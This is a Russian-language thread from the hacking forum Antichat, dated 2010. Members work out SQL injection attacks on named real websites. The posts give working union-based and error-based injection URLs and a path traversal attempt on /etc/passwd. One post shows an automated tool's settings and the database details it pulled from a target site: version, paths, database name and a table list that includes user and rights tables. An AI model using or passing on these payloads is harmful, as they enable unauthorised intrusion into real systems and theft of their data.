Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
03.04.2010, 19:40
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
тут данные можно вывести ?
http://www.ruraldoc.com.au/content_sub.php?id=-1+union+select+1,2,3,4,5,6--
|
|
|
03.04.2010, 19:42
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2daniel_1024
http://www.ruraldoc.com.au/content_sub.php?id=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os))),4,5, 6--
|
|
|
|
03.04.2010, 19:55
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
http://www.ruraldoc.com.au/content_sub.php?id=(select(1)from(select+count(0), concat((select(version())),floor(rand(0)*2))from(s econd_level)+group+by+2)a)
))
|
|
|
|
03.04.2010, 20:18
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love
Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd
На что система мне выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '../.../.../.../.../.../.../../../.../etc/passwd' at line 1 SELECT `id`, `title` FROM `statpage` WHERE `sid`
http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться
Вообщем, если ли тут иньекция?
Инклуд или скуль? |
|
|
|
03.04.2010, 20:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+count(0),concat((select(version())),floor(rand(0)*2))from(statpage)+group+by+2)a)--+
)) |
|
|
|
03.04.2010, 20:25
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Ershik
Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love
Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd
На что система мне выдает:
http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться
Вообщем, если ли тут иньекция?
Инклуд или скуль?
инклуд нету потому что love это значение колонки "сид" в бд, а не файл
Последний раз редактировалось Konqi; 03.04.2010 в 21:49..
|
|
|
|
03.04.2010, 20:31
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Понял.
Тогда почему используется функция
(select(1)from(select+count(0),concat((select(vers ion())),floor(rand(0)*2 ))from(statpage)+group+by+2)a)--+
Кодирование это понятно, только почему в такой последовательности и "--+" - какое имеет значение для уязвимого запроса?
|
|
|
|
03.04.2010, 20:34
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Ershik.
"--+" - плюсом "обрезают комментарий"
|
|
|
|
03.04.2010, 20:43
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Понятно.
Я хочу выяснить наименование столбцов и полей.
По типу:
http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --
:
Произвожу иньекцию, подобно этой:
http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from(select+c ount(0),concat((select(TABLE_NAME)),floor(rand(0)* 2))from(statpage)+FROM
+INFORMATION_SCHEMA.TABLES+LIMIT+1,1)a)--+
Я не совсем понимаю механизм заключения все в concat и floor
Существует какой-то онлайн сервис или программа для преобразования?
Как с его помощью можно вытащить названия таблиц, полей?
|
|
|
|
03.04.2010, 21:03
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
тыцк
Код:
$method = 0; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
$f_table = "statpage";
$f_url = "http://mihadmin.ru/statpage.php?sid=love'+and+(select(1)from"; # url
$f_plus = "+"; #
$f_filtr = "a)--+";
Код:
System information:
-----------------------------------------
ver:5.0.51a-24+lenny2
datadir:/var/lib/mysql/
os:debian-linux-gnu
base:mihadmin_main
basedir:/usr/
tmpdir:/tmp
-----------------------------------------
Tables in information_schema.tables - 27
-----------------------------------------
COLLATIONS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
article
const
group
group_refer
menu
rights
statpage
CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
news
rights_refer
user
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
